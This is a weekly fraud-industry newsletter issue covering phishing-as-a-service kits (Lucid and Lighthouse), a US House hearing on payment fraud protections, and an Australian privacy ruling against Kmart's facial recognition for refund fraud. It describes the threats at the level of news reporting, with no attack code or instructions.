#50: Phishing Kits, Consumer Protection Hearing, Kmart Fined for Face Scanning

From industrial-scale phishing kits to underwhelming regulation and overreaching tech, this week’s stories show how far the fraud problem has stretched and how uneven the responses are.

Let’s get into it.

NATE'S TAKE - SEPTEMBER 23, 2025

Top Three This Week

1. Industrial-Scale Phishing Gets an Upgrade
2. National Consumer Groups Push for Tougher Fraud Protections
3. Kmart Fined for Using Facial Recognition to Spot Refund Fraud

1. Industrial-Scale Phishing Gets an Upgrade

Lucid and Lighthouse, a pair of phishing-as-a-service platforms, have been linked to over 17,500 phishing domains targeting 316 brands in 74 countries. These services offer fraudsters custom phishing templates, real-time victim tracking, and delivery options based on device type, browser, and IP geolocation, making their scams harder to detect and block.

Lucid’s smishing capabilities (via iMessage and RCS) and Lighthouse’s template flexibility show how phishing tools are becoming turnkey solutions for attackers. Some kits even display fake storefronts to unintended visitors to keep operations covert. Annual subscriptions run up to $1,588, with impersonation kits covering postal services, government agencies, and crypto wallets like MetaMask and Phantom.

Risks to watch:

• Chrome extension spoofing to drain wallets
• EmailJS used to steal credentials and 2FA codes
• Scams requiring crypto deposits to “unlock” tasks or benefits

Phishing infrastructure is scaling fast. These kits show just how commoditized and targeted modern phishing has become.

2. National Consumer Groups Push for Tougher Fraud Protections

At a recent U.S. House hearing on payment fraud, Carla Sanchez-Adams of the National Consumer Law Center made it clear: payment fraud is a national crisis and current protections aren’t enough. With $12.5 billion in reported consumer fraud losses in 2024 alone (and likely much more unreported), she called for stronger legal and technical safeguards across the financial system.

Key areas of concern:

• Peer-to-peer apps, crypto platforms, wire transfers, and EBT skimming are increasingly abused by scammers.
• Vulnerable groups, including older Americans and low-income communities, are hit hardest and often struggle to recover.

Sanchez-Adams urged Congress to close protection gaps, hold both sending and receiving institutions accountable, and modernize outdated laws. She also called for interagency data sharing and tighter oversight of telecom and social platforms, which are often exploited to deliver scam messages.

As we've seen in past FIF issues, payments fraud is becoming a systemic risk. Congress and regulators are finally acknowledging the scope of the problem, but so far, there’s more talk than teeth. For fraud leaders, that means continuing to build layered defenses, because legislative help still isn’t arriving fast.

3. Kmart Fined for Using Facial Recognition to Spot Refund Fraud

Australia’s privacy watchdog has ruled that Kmart violated privacy laws by scanning the faces of every customer entering 28 of its stores between 2020 and 2022, all in an effort to stop refund fraud.

The ruling focused on proportionality: Kmart collected sensitive biometric data on thousands of people without their consent, including individuals not suspected of any wrongdoing. The system was found to have minimal fraud-prevention impact and failed to meet the standards of transparency or necessity under Australia’s Privacy Act.

The takeaway for fraud teams? Biometric surveillance can’t be justified as a blanket measure, especially when less invasive controls (like better ID checks at returns counters) are available. It’s a clear reminder that even well-intentioned fraud strategies can cross legal and ethical lines if they aren’t thoughtfully designed.

===

That’s all for this week! For more insights, follow us on LinkedIn or X, and if you want to learn more about what we do, visit www.specprotected.com.

‍